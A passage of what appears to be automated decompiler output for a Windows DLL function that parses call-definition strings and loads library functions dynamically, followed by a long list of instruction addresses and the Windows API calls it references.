									_v28 = _v24;
									_t273 = 0;
									__eflags = 0;
									L55:
									_t317 = _t309 + 1;
									__eflags = _t317;
									_v12 = _t317;
									goto L56;
								}
								__eflags = _t308 - 0x2d;
								if(_t308 == 0x2d) {
									L145:
									_t253 = _t309 + 1;
									__eflags =  *_t253 - 0x3e;
									if( *_t253 != 0x3e) {
										L147:
										_t253 = _t309 + 1;
										__eflags =  *_t253 - 0x3a;
										if( *_t253 != 0x3a) {
											L154:
											_v28 =  &(_v28[1]);
											 *_v28 = _t308;
											goto L55;
										}
										__eflags = _t308 - 0x2d;
										if(_t308 == 0x2d) {
											goto L154;
										}
										_v36 = 1;
										L150:
										_v12 = _t253;
										__eflags = _v28 - _v24;
										if(_v28 <= _v24) {
											 *_v44 =  *_v44 & 0x00000000;
										} else {
											 *_v28 =  *_v28 & 0x00000000;
											lstrcpyA(_v44, _v24);
										}
										goto L54;
									}
									_v36 = 3;
									goto L150;
								}
								__eflags = _t308 - 0x3a;
								if(_t308 != 0x3a) {
									goto L154;
								}
								__eflags = _t308 - 0x2d;
								if(_t308 != 0x2d) {
									goto L147;
								}
								goto L145;
							}
							_t259 = _t251 - 1;
							__eflags = _t259;
							if(_t259 == 0) {
								L77:
								_t293 = _t276 + 0xffffffde;
								__eflags = _t293 - 0x55;
								if(_t293 > 0x55) {
									goto L54;
								}
								switch( *((intOrPtr*)(( *(_t293 + 0x706b2219) & 0x000000ff) * 4 +  &M706B218D))) {
									case 0:
										__eax = _v24;
										__edi = _v12;
										while(1) {
											__edi = __edi + 1;
											_v12 = __edi;
											__cl =  *__edi;
											__eflags = __cl - __dl;
											if(__cl != __dl) {
												goto L129;
											}
											L128:
											__eflags =  *(__edi + 1) - __dl;
											if( *(__edi + 1) != __dl) {
												L133:
												 *__eax =  *__eax & 0x00000000;
												__eax = E706B1224(_v24);
												__ebx = __eax;
												goto L94;
											}
											L129:
											__eflags = __cl;
											if(__cl == 0) {
												goto L133;
											}
											__eflags = __cl - __dl;
											if(__cl == __dl) {
												__edi = __edi + 1;
												__eflags = __edi;
											}
											__cl =  *__edi;
											 *__eax =  *__edi;
											__eax = __eax + 1;
											__edi = __edi + 1;
											_v12 = __edi;
											__cl =  *__edi;
											__eflags = __cl - __dl;
											if(__cl != __dl) {
												goto L129;
											}
											goto L128;
										}
									case 1:
										_v8 = 1;
										goto L54;
									case 2:
										_v8 = _v8 | 0xffffffff;
										goto L54;
									case 3:
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v16 = _v16 + 1;
										goto L82;
									case 4:
										__eflags = _v20;
										if(_v20 != 0) {
											goto L54;
										}
										_v12 = _v12 - 1;
										__ebx = E706B1215();
										 &_v12 = E706B1A36( &_v12);
										__eax = E706B1429(__edx, __eax, __edx, __ebx);
										goto L94;
									case 5:
										L102:
										_v20 = _v20 + 1;
										goto L54;
									case 6:
										_push(7);
										goto L120;
									case 7:
										_push(0x19);
										goto L140;
									case 8:
										__eax = 0;
										__eax = 1;
										__eflags = 1;
										goto L104;
									case 9:
										_push(0x15);
										goto L140;
									case 0xa:
										_push(0x16);
										goto L140;
									case 0xb:
										_push(0x18);
										goto L140;
									case 0xc:
										__eax = 0;
										__eax = 1;
										__eflags = 1;
										goto L115;
									case 0xd:
										__eax = 0;
										__eax = 1;
										__eflags = 1;
										goto L106;
									case 0xe:
										__eax = 0;
										__eax = 1;
										__eflags = 1;
										goto L108;
									case 0xf:
										__eax = 0;
										__eax = 1;
										__eflags = 1;
										goto L119;
									case 0x10:
										__eax = 0;
										__eax = 1;
										__eflags = 1;
										goto L110;
									case 0x11:
										_push(3);
										goto L120;
									case 0x12:
										_push(0x17);
										L140:
										_pop(__ebx);
										goto L95;
									case 0x13:
										__eax =  &_v12;
										__eax = E706B1A36( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										__eflags = __ebx - 0xb;
										if(__ebx < 0xb) {
											__ebx = __ebx + 0xa;
										}
										goto L94;
									case 0x14:
										__ebx = 0xffffffff;
										goto L95;
									case 0x15:
										__eax = 0;
										__eflags = 0;
										goto L113;
									case 0x16:
										__ecx = 0;
										__eflags = 0;
										goto L88;
									case 0x17:
										__eax = 0;
										__eax = 1;
										__eflags = 1;
										goto L117;
									case 0x18:
										_t261 =  *(_t318 + 0x814);
										__eflags = _t261 - _v16;
										if(_t261 > _v16) {
											_v16 = _t261;
										}
										_v8 = _v8 & 0x00000000;
										_v20 = _v20 & 0x00000000;
										_v36 - 3 = _t261 - (_v36 == 3);
										if(_t261 != _v36 == 3) {
											L82:
											_v40 = 1;
										}
										goto L54;
									case 0x19:
										L104:
										__ecx = 0;
										_v8 = 2;
										__ecx = 1;
										goto L88;
									case 0x1a:
										L115:
										_push(5);
										goto L120;
									case 0x1b:
										L106:
										__ecx = 0;
										_v8 = 3;
										__ecx = 1;
										goto L88;
									case 0x1c:
										L108:
										__ecx = 0;
										__ecx = 1;
										goto L88;
									case 0x1d:
										L119:
										_push(6);
										goto L120;
									case 0x1e:
										L110:
										_push(2);
										goto L120;
									case 0x1f:
										__eax =  &_v12;
										__eax = E706B1A36( &_v12);
										__ebx = __eax;
										__ebx = __eax + 1;
										goto L94;
									case 0x20:
										L113:
										_v48 = _v48 + 1;
										_push(3);
										_pop(__ecx);
										goto L88;
									case 0x21:
										L117:
										_push(4);
										L120:
										_pop(__ecx);
										L88:
										__edi = _v16;
										__edx =  *(0x706b305c + __ecx * 4);
										__eax =  ~__eax;
										asm("sbb eax, eax");
										_v40 = 1;
										__edi = _v16 << 5;
										__eax = __eax & 0x00008000;
										__edi = (_v16 << 5) + __esi;
										__eax = __eax | __ecx;
										__eflags = _v8;
										 *(__edi + 0x818) = __eax;
										if(_v8 < 0) {
											L90:
											__edx = 0;
											__edx = 1;
											__eflags = 1;
											L91:
											__eflags = _v8 - 1;
											 *(__edi + 0x828) = __edx;
											if(_v8 == 1) {
												__eax =  &_v12;
												__eax = E706B1A36( &_v12);
												__eax = __eax + 1;
												__eflags = __eax;
												_v8 = __eax;
											}
											__eax = _v8;
											 *((intOrPtr*)(__edi + 0x81c)) = _v8;
											_t132 = _v16 + 0x41; // 0x41
											_t132 = _t132 << 5;
											__eax = 0;
											__eflags = 0;
											 *((intOrPtr*)((_t132 << 5) + __esi)) = 0;
											 *((intOrPtr*)(__edi + 0x830)) = 0;
											 *((intOrPtr*)(__edi + 0x82c)) = 0;
											L94:
											__eflags = __ebx;
											if(__ebx == 0) {
												goto L54;
											}
											L95:
											__eflags = _v20;
											_v40 = 1;
											if(_v20 != 0) {
												L100:
												__eflags = _v20 - 1;
												if(_v20 == 1) {
													__eax = _v16;
													__eax = _v16 << 5;
													__eflags = __eax;
													 *(__eax + __esi + 0x82c) = __ebx;
												}
												goto L102;
											}
											_v16 = _v16 << 5;
											_t140 = __esi + 0x830; // 0x830
											__edi = (_v16 << 5) + _t140;
											__eax =  *__edi;
											__eflags = __eax - 0xffffffff;
											if(__eax <= 0xffffffff) {
												L98:
												__eax = GlobalFree(__eax);
												L99:
												 *__edi = __ebx;
												goto L100;
											}
											__eflags = __eax - 0x19;
											if(__eax <= 0x19) {
												goto L99;
											}
											goto L98;
										}
										__eflags = __edx;
										if(__edx > 0) {
											goto L91;
										}
										goto L90;
									case 0x22:
										goto L54;
								}
							}
							_t262 = _t259 - 1;
							__eflags = _t262;
							if(_t262 == 0) {
								_v16 = _t273;
								goto L77;
							}
							__eflags = _t262 != 1;
							if(_t262 != 1) {
								goto L154;
							}
							__eflags = _t276 - 0x6e;
							if(__eflags > 0) {
								_t297 = _t276 - 0x72;
								__eflags = _t297;
								if(_t297 == 0) {
									_push(4);
									L71:
									_pop(_t264);
									L72:
									__eflags = _v8 - 1;
									if(_v8 != 1) {
										_t92 = _t318 + 0x810;
										 *_t92 =  *(_t318 + 0x810) &  !_t264;
										__eflags =  *_t92;
									} else {
										 *(_t318 + 0x810) =  *(_t318 + 0x810) | _t264;
									}
									_v8 = 1;
									goto L54;
								}
								_t300 = _t297 - 1;
								__eflags = _t300;
								if(_t300 == 0) {
									_push(0x10);
									goto L71;
								}
								__eflags = _t300 != 0;
								if(_t300 != 0) {
									goto L54;
								}
								_push(0x40);
								goto L71;
							}
							if(__eflags == 0) {
								_push(8);
								goto L71;
							}
							_t303 = _t276 - 0x21;
							__eflags = _t303;
							if(_t303 == 0) {
								_v8 =  ~_v8;
								goto L54;
							}
							_t304 = _t303 - 0x11;
							__eflags = _t304;
							if(_t304 == 0) {
								_t264 = 0x100;
								goto L72;
							}
							_t305 = _t304 - 0x31;
							__eflags = _t305;
							if(_t305 == 0) {
								_t264 = 1;
								goto L72;
							}
							__eflags = _t305 != 0;
							if(_t305 != 0) {
								goto L54;
							}
							_push(0x20);
							goto L71;
						}
						goto L15;
					}
					_t267 = _t249 - 5;
					if(_t267 == 0) {
						__eflags = _v36 - 3;
						_v32 = 1;
						_v8 = _t273;
						_v20 = _t273;
						_v16 = (0 | _v36 == 0x00000003) + 1;
						_v40 = _t273;
						goto L17;
					}
					_t271 = _t267 - 1;
					if(_t271 == 0) {
						_v32 = 2;
						_v8 = _t273;
						_v20 = _t273;
						goto L17;
					}
					if(_t271 != 0x16) {
						goto L40;
					} else {
						_v32 = 3;
						_v8 = 1;
						goto L17;
					}
				}
				GlobalFree(_v52);
				GlobalFree(_v24);
				GlobalFree(_v44);
				if(_t318 == _t273 ||  *(_t318 + 0x80c) != _t273) {
					L174:
					return _t318;
				} else {
					_t216 =  *_t318 - 1;
					if(_t216 == 0) {
						_t179 = _t318 + 8; // 0x8
						_t312 = _t179;
						__eflags =  *_t312;
						if( *_t312 != 0) {
							_t217 = GetModuleHandleA(_t312);
							__eflags = _t217 - _t273;
							 *(_t318 + 0x808) = _t217;
							if(_t217 != _t273) {
								L163:
								_t184 = _t318 + 0x408; // 0x408
								_t313 = _t184;
								_t218 = E706B15C2( *(_t318 + 0x808), _t313);
								__eflags = _t218 - _t273;
								 *(_t318 + 0x80c) = _t218;
								if(_t218 == _t273) {
									__eflags =  *_t313 - 0x23;
									if( *_t313 == 0x23) {
										_t187 = _t318 + 0x409; // 0x409
										_t222 = E706B12FE(_t187);
										__eflags = _t222 - _t273;
										if(_t222 != _t273) {
											__eflags = _t222 & 0xffff0000;
											if((_t222 & 0xffff0000) == 0) {
												 *(_t318 + 0x80c) = GetProcAddress( *(_t318 + 0x808), _t222 & 0x0000ffff);
											}
										}
									}
								}
								__eflags = _v48 - _t273;
								if(_v48 != _t273) {
									L170:
									_t313[lstrlenA(_t313)] = 0x41;
									_t220 = E706B15C2( *(_t318 + 0x808), _t313);
									__eflags = _t220 - _t273;
									if(_t220 != _t273) {
										L158:
										 *(_t318 + 0x80c) = _t220;
										goto L174;
									}
									__eflags =  *(_t318 + 0x80c) - _t273;
									L172:
									if(__eflags != 0) {
										goto L174;
									}
									L173:
									_t197 = _t318 + 4;
									 *_t197 =  *(_t318 + 4) | 0xffffffff;
									__eflags =  *_t197;
									goto L174;
								} else {
									__eflags =  *(_t318 + 0x80c) - _t273;
									if( *(_t318 + 0x80c) != _t273) {
										goto L174;
									}
									goto L170;
								}
							}
							_t225 = LoadLibraryA(_t312);
							__eflags = _t225 - _t273;
							 *(_t318 + 0x808) = _t225;
							if(_t225 == _t273) {
								goto L173;
							}
							goto L163;
						}
						_t180 = _t318 + 0x408; // 0x408
						_t227 = E706B12FE(_t180);
						 *(_t318 + 0x80c) = _t227;
						__eflags = _t227 - _t273;
						goto L172;
					}
					_t228 = _t216 - 1;
					if(_t228 == 0) {
						_t177 = _t318 + 0x408; // 0x408
						_t229 = _t177;
						__eflags =  *_t229;
						if( *_t229 == 0) {
							goto L174;
						}
						_t220 = E706B12FE(_t229);
						L157:
						goto L158;
					}
					if(_t228 != 1) {
						goto L174;
					}
					_t77 = _t318 + 8; // 0x8
					_t274 = _t77;
					_t314 = E706B12FE(_t77);
					 *(_t318 + 0x808) = _t314;
					if(_t314 == 0) {
						goto L173;
					}
					 *(_t318 + 0x84c) =  *(_t318 + 0x84c) & 0x00000000;
					 *((intOrPtr*)(_t318 + 0x850)) = E706B1224(_t274);
					 *(_t318 + 0x83c) =  *(_t318 + 0x83c) & 0x00000000;
					 *((intOrPtr*)(_t318 + 0x848)) = 1;
					 *((intOrPtr*)(_t318 + 0x838)) = 1;
					_t86 = _t318 + 0x408; // 0x408
					_t220 =  *(_t314->i + E706B12FE(_t86) * 4);
					goto L157;
				}
			}
































































                                                      0x706b1aa0
                                                      0x706b1aa3
                                                      0x706b1aa6
                                                      0x706b1aa9
                                                      0x706b1aac
                                                      0x706b1aaf
                                                      0x706b1ab2
                                                      0x706b1ab4
                                                      0x706b1ab7
                                                      0x706b1abc
                                                      0x706b1abf
                                                      0x706b1ac7
                                                      0x706b1acf
                                                      0x706b1ad1
                                                      0x706b1ad4
                                                      0x706b1adc
                                                      0x706b1adc
                                                      0x706b1ae1
                                                      0x706b1ae4
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1aee
                                                      0x706b1af0
                                                      0x706b1af5
                                                      0x706b1af7
                                                      0x706b1b69
                                                      0x706b1b69
                                                      0x706b1b69
                                                      0x706b1b6d
                                                      0x706b1b70
                                                      0x706b1b72
                                                      0x706b1b94
                                                      0x706b1b97
                                                      0x706b1b99
                                                      0x706b1ba2
                                                      0x706b1ba8
                                                      0x706b1baa
                                                      0x706b1bb0
                                                      0x706b1bb0
                                                      0x706b1bb6
                                                      0x706b1bb9
                                                      0x706b1bb9
                                                      0x706b1bbc
                                                      0x706b1bbc
                                                      0x706b1bc2
                                                      0x706b1bc4
                                                      0x706b1bc7
                                                      0x706b1bcd
                                                      0x706b1bd0
                                                      0x706b1bd0
                                                      0x706b1bd2
                                                      0x706b1bd8
                                                      0x706b1bdb
                                                      0x706b1bff
                                                      0x706b1c02
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1c05
                                                      0x706b1c07
                                                      0x706b1c15
                                                      0x706b1c18
                                                      0x706b1c1a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1c1c
                                                      0x706b1c1c
                                                      0x706b1c1c
                                                      0x706b1c22
                                                      0x706b1c24
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1c26
                                                      0x706b1c28
                                                      0x706b1c2a
                                                      0x706b1c2c
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1c2c
                                                      0x706b1c2e
                                                      0x706b1c30
                                                      0x706b1c32
                                                      0x706b1c32
                                                      0x706b1c38
                                                      0x706b1c3e
                                                      0x706b1c40
                                                      0x706b1c54
                                                      0x706b1c54
                                                      0x706b1c56
                                                      0x706b1c42
                                                      0x706b1c48
                                                      0x706b1c4b
                                                      0x706b1c4b
                                                      0x00000000
                                                      0x706b1bdd
                                                      0x706b1bdd
                                                      0x706b1bdd
                                                      0x706b1bde
                                                      0x706b1be6
                                                      0x706b1bea
                                                      0x706b1bf0
                                                      0x706b1bf4
                                                      0x706b1c5c
                                                      0x706b1c5f
                                                      0x706b1c62
                                                      0x706b1cd4
                                                      0x706b1cd8
                                                      0x706b1ad9
                                                      0x00000000
                                                      0x706b1ad9
                                                      0x00000000
                                                      0x706b1cd8
                                                      0x706b1be0
                                                      0x706b1be0
                                                      0x706b1be1
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1be3
                                                      0x706b1be4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1be4
                                                      0x706b1bdb
                                                      0x706b1b75
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1b7e
                                                      0x706b1b81
                                                      0x706b1b8e
                                                      0x706b1b8e
                                                      0x706b1b83
                                                      0x00000000
                                                      0x706b1b83
                                                      0x706b1af9
                                                      0x706b1afc
                                                      0x706b1b4d
                                                      0x706b1b50
                                                      0x706b1b61
                                                      0x706b1b61
                                                      0x706b1b64
                                                      0x00000000
                                                      0x706b1b64
                                                      0x706b1b52
                                                      0x706b1b56
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1b58
                                                      0x706b1b5b
                                                      0x706b1c67
                                                      0x706b1c6a
                                                      0x706b1c6a
                                                      0x706b1c6c
                                                      0x706b2011
                                                      0x706b2014
                                                      0x706b2077
                                                      0x706b1cc5
                                                      0x706b1cc8
                                                      0x706b1ccb
                                                      0x706b1cce
                                                      0x706b1cce
                                                      0x706b1cd0
                                                      0x706b1cd0
                                                      0x706b1cd0
                                                      0x706b1cd1
                                                      0x00000000
                                                      0x706b1cd1
                                                      0x706b2016
                                                      0x706b2019
                                                      0x706b2025
                                                      0x706b2025
                                                      0x706b2028
                                                      0x706b202b
                                                      0x706b2036
                                                      0x706b2036
                                                      0x706b2039
                                                      0x706b203c
                                                      0x706b2083
                                                      0x706b2086
                                                      0x706b2089
                                                      0x00000000
                                                      0x706b2089
                                                      0x706b203e
                                                      0x706b2041
                                                      0x00000000
                                                      0x00000000
                                                      0x706b2043
                                                      0x706b204a
                                                      0x706b204a
                                                      0x706b2050
                                                      0x706b2053
                                                      0x706b206f
                                                      0x706b2055
                                                      0x706b205e
                                                      0x706b2061
                                                      0x706b2061
                                                      0x00000000
                                                      0x706b2053
                                                      0x706b202d
                                                      0x00000000
                                                      0x706b202d
                                                      0x706b201b
                                                      0x706b201e
                                                      0x00000000
                                                      0x00000000
                                                      0x706b2020
                                                      0x706b2023
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x706b2023
                                                      0x706b1c72
                                                      0x706b1c72
                                                      0x706b1c73
                                                      0x706b1dbc
                                                      0x706b1dbc
                                                      0x706b1dc3
                                                      0x706b1dc6
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1dd3
                                                      0x00000000
                                                      0x706b1fb9
                                                      0x706b1fbc
                                                      0x706b1fbf
                                                      0x706b1fbf
                                                      0x706b1fc0
                                                      0x706b1fc3
                                                      0x706b1fc5
                                                      0x706b1fc7
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1fc9
                                                      0x706b1fc9
                                                      0x706b1fcc
                                                      0x706b1fde
                                                      0x706b1fe1
                                                      0x706b1fe4
                                                      0x706b1fea
                                                      0x00000000
                                                      0x706b1fea
                                                      0x706b1fce
                                                      0x706b1fce
                                                      0x706b1fd0
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1fd2
                                                      0x706b1fd4
                                                      0x706b1fd6
                                                      0x706b1fd6
                                                      0x706b1fd6
                                                      0x706b1fd7
                                                      0x706b1fd9
                                                      0x706b1fdb
                                                      0x706b1fbf
                                                      0x706b1fc0
                                                      0x706b1fc3
                                                      0x706b1fc5
                                                      0x706b1fc7
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1fc7
                                                      0x00000000
                                                      0x706b1e1a
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1e26
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1e0d
                                                      0x706b1e11
                                                      0x706b1e15
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f8b
                                                      0x706b1f8f
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f95
                                                      0x706b1f9d
                                                      0x706b1fa4
                                                      0x706b1fac
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1ef3
                                                      0x706b1ef3
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1e2f
                                                      0x00000000
                                                      0x00000000
                                                      0x706b2009
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1efb
                                                      0x706b1efd
                                                      0x706b1efd
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1ff9
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1ffd
                                                      0x00000000
                                                      0x00000000
                                                      0x706b2005
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f42
                                                      0x706b1f44
                                                      0x706b1f44
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f0d
                                                      0x706b1f0f
                                                      0x706b1f0f
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f1f
                                                      0x706b1f21
                                                      0x706b1f21
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f50
                                                      0x706b1f52
                                                      0x706b1f52
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f2a
                                                      0x706b1f2c
                                                      0x706b1f2c
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f31
                                                      0x00000000
                                                      0x00000000
                                                      0x706b2001
                                                      0x706b200b
                                                      0x706b200b
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f5b
                                                      0x706b1f5f
                                                      0x706b1f64
                                                      0x706b1f67
                                                      0x706b1f68
                                                      0x706b1f6b
                                                      0x706b1f71
                                                      0x706b1f71
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1ff1
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f35
                                                      0x706b1f35
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1e36
                                                      0x706b1e36
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f49
                                                      0x706b1f4b
                                                      0x706b1f4b
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1dda
                                                      0x706b1de0
                                                      0x706b1de3
                                                      0x706b1de5
                                                      0x706b1de5
                                                      0x706b1de8
                                                      0x706b1dec
                                                      0x706b1df9
                                                      0x706b1dfb
                                                      0x706b1e01
                                                      0x706b1e01
                                                      0x706b1e01
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1efe
                                                      0x706b1efe
                                                      0x706b1f00
                                                      0x706b1f07
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f45
                                                      0x706b1f45
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f10
                                                      0x706b1f10
                                                      0x706b1f12
                                                      0x706b1f19
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f22
                                                      0x706b1f22
                                                      0x706b1f24
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f53
                                                      0x706b1f53
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f2d
                                                      0x706b1f2d
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f79
                                                      0x706b1f7d
                                                      0x706b1f82
                                                      0x706b1f85
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f37
                                                      0x706b1f37
                                                      0x706b1f3a
                                                      0x706b1f3c
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1f4c
                                                      0x706b1f4c
                                                      0x706b1f55
                                                      0x706b1f55
                                                      0x706b1e38
                                                      0x706b1e38
                                                      0x706b1e3b
                                                      0x706b1e42
                                                      0x706b1e44
                                                      0x706b1e46
                                                      0x706b1e4d
                                                      0x706b1e50
                                                      0x706b1e55
                                                      0x706b1e57
                                                      0x706b1e59
                                                      0x706b1e5d
                                                      0x706b1e63
                                                      0x706b1e69
                                                      0x706b1e69
                                                      0x706b1e6b
                                                      0x706b1e6b
                                                      0x706b1e6c
                                                      0x706b1e6c
                                                      0x706b1e70
                                                      0x706b1e76
                                                      0x706b1e78
                                                      0x706b1e7c
                                                      0x706b1e81
                                                      0x706b1e81
                                                      0x706b1e83
                                                      0x706b1e83
                                                      0x706b1e86
                                                      0x706b1e89
                                                      0x706b1e92
                                                      0x706b1e95
                                                      0x706b1e98
                                                      0x706b1e98
                                                      0x706b1e9a
                                                      0x706b1e9d
                                                      0x706b1ea3
                                                      0x706b1ea9
                                                      0x706b1ea9
                                                      0x706b1eab
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1eb1
                                                      0x706b1eb1
                                                      0x706b1eb5
                                                      0x706b1ebc
                                                      0x706b1ee0
                                                      0x706b1ee0
                                                      0x706b1ee4
                                                      0x706b1ee6
                                                      0x706b1ee9
                                                      0x706b1ee9
                                                      0x706b1eec
                                                      0x706b1eec
                                                      0x00000000
                                                      0x706b1ee4
                                                      0x706b1ec1
                                                      0x706b1ec4
                                                      0x706b1ec4
                                                      0x706b1ecb
                                                      0x706b1ecd
                                                      0x706b1ed0
                                                      0x706b1ed7
                                                      0x706b1ed8
                                                      0x706b1ede
                                                      0x706b1ede
                                                      0x00000000
                                                      0x706b1ede
                                                      0x706b1ed2
                                                      0x706b1ed5
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1ed5
                                                      0x706b1e65
                                                      0x706b1e67
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1dd3
                                                      0x706b1c79
                                                      0x706b1c79
                                                      0x706b1c7a
                                                      0x706b1db9
                                                      0x00000000
                                                      0x706b1db9
                                                      0x706b1c80
                                                      0x706b1c81
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1c87
                                                      0x706b1c8a
                                                      0x706b1d7e
                                                      0x706b1d7e
                                                      0x706b1d81
                                                      0x706b1d96
                                                      0x706b1d98
                                                      0x706b1d98
                                                      0x706b1d99
                                                      0x706b1d9c
                                                      0x706b1d9f
                                                      0x706b1dab
                                                      0x706b1dab
                                                      0x706b1dab
                                                      0x706b1da1
                                                      0x706b1da1
                                                      0x706b1da1
                                                      0x706b1db1
                                                      0x00000000
                                                      0x706b1db1
                                                      0x706b1d83
                                                      0x706b1d83
                                                      0x706b1d84
                                                      0x706b1d92
                                                      0x00000000
                                                      0x706b1d92
                                                      0x706b1d87
                                                      0x706b1d88
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1d8e
                                                      0x00000000
                                                      0x706b1d8e
                                                      0x706b1c90
                                                      0x706b1d7a
                                                      0x00000000
                                                      0x706b1d7a
                                                      0x706b1c96
                                                      0x706b1c96
                                                      0x706b1c99
                                                      0x706b1cc2
                                                      0x00000000
                                                      0x706b1cc2
                                                      0x706b1c9b
                                                      0x706b1c9b
                                                      0x706b1c9e
                                                      0x706b1cb8
                                                      0x00000000
                                                      0x706b1cb8
                                                      0x706b1ca0
                                                      0x706b1ca0
                                                      0x706b1ca3
                                                      0x706b1cb2
                                                      0x00000000
                                                      0x706b1cb2
                                                      0x706b1ca6
                                                      0x706b1ca7
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1ca9
                                                      0x00000000
                                                      0x706b1ca9
                                                      0x00000000
                                                      0x706b1b5b
                                                      0x706b1afe
                                                      0x706b1b01
                                                      0x706b1b30
                                                      0x706b1b34
                                                      0x706b1b3b
                                                      0x706b1b42
                                                      0x706b1b45
                                                      0x706b1b48
                                                      0x00000000
                                                      0x706b1b48
                                                      0x706b1b03
                                                      0x706b1b04
                                                      0x706b1b1f
                                                      0x706b1b26
                                                      0x706b1b29
                                                      0x00000000
                                                      0x706b1b29
                                                      0x706b1b09
                                                      0x00000000
                                                      0x706b1b0f
                                                      0x706b1b0f
                                                      0x706b1b16
                                                      0x00000000
                                                      0x706b1b16
                                                      0x706b1b09
                                                      0x706b1ce7
                                                      0x706b1cec
                                                      0x706b1cf1
                                                      0x706b1cf5
                                                      0x706b2186
                                                      0x706b218c
                                                      0x706b1d07
                                                      0x706b1d09
                                                      0x706b1d0a
                                                      0x706b20b1
                                                      0x706b20b1
                                                      0x706b20b4
                                                      0x706b20b7
                                                      0x706b20d4
                                                      0x706b20da
                                                      0x706b20dc
                                                      0x706b20e2
                                                      0x706b20f9
                                                      0x706b20f9
                                                      0x706b20f9
                                                      0x706b2106
                                                      0x706b210c
                                                      0x706b210f
                                                      0x706b2115
                                                      0x706b2117
                                                      0x706b211a
                                                      0x706b211c
                                                      0x706b2123
                                                      0x706b2128
                                                      0x706b212b
                                                      0x706b212d
                                                      0x706b2132
                                                      0x706b2144
                                                      0x706b2144
                                                      0x706b2132
                                                      0x706b212b
                                                      0x706b211a
                                                      0x706b214a
                                                      0x706b214d
                                                      0x706b2157
                                                      0x706b215f
                                                      0x706b216b
                                                      0x706b2171
                                                      0x706b2174
                                                      0x706b20a6
                                                      0x706b20a6
                                                      0x00000000
                                                      0x706b20a6
                                                      0x706b217a
                                                      0x706b2180
                                                      0x706b2180
                                                      0x00000000
                                                      0x00000000
                                                      0x706b2182
                                                      0x706b2182
                                                      0x706b2182
                                                      0x706b2182
                                                      0x00000000
                                                      0x706b214f
                                                      0x706b214f
                                                      0x706b2155
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x706b2155
                                                      0x706b214d
                                                      0x706b20e5
                                                      0x706b20eb
                                                      0x706b20ed
                                                      0x706b20f3
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x706b20f3
                                                      0x706b20b9
                                                      0x706b20c0
                                                      0x706b20c6
                                                      0x706b20cc
                                                      0x00000000
                                                      0x706b20cc
                                                      0x706b1d10
                                                      0x706b1d11
                                                      0x706b2090
                                                      0x706b2090
                                                      0x706b2096
                                                      0x706b2099
                                                      0x00000000
                                                      0x00000000
                                                      0x706b20a0
                                                      0x706b20a5
                                                      0x00000000
                                                      0x706b20a5
                                                      0x706b1d18
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1d1e
                                                      0x706b1d1e
                                                      0x706b1d27
                                                      0x706b1d2c
                                                      0x706b1d32
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1d38
                                                      0x706b1d45
                                                      0x706b1d4b
                                                      0x706b1d55
                                                      0x706b1d5b
                                                      0x706b1d63
                                                      0x706b1d73
                                                      0x00000000
                                                      0x706b1d73

                                                      APIs
                                                        • Part of subcall function 706B1215: GlobalAlloc.KERNEL32(00000040,706B1233,?,706B12CF,-706B404B,706B11AB,-000000A0), ref: 706B121D
                                                      • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 706B1BA2
                                                      • lstrcpyA.KERNEL32(00000008,?), ref: 706B1BEA
                                                      • lstrcpyA.KERNEL32(00000408,?), ref: 706B1BF4
                                                      • GlobalFree.KERNEL32(00000000), ref: 706B1C07
                                                      • GlobalFree.KERNEL32(?), ref: 706B1CE7
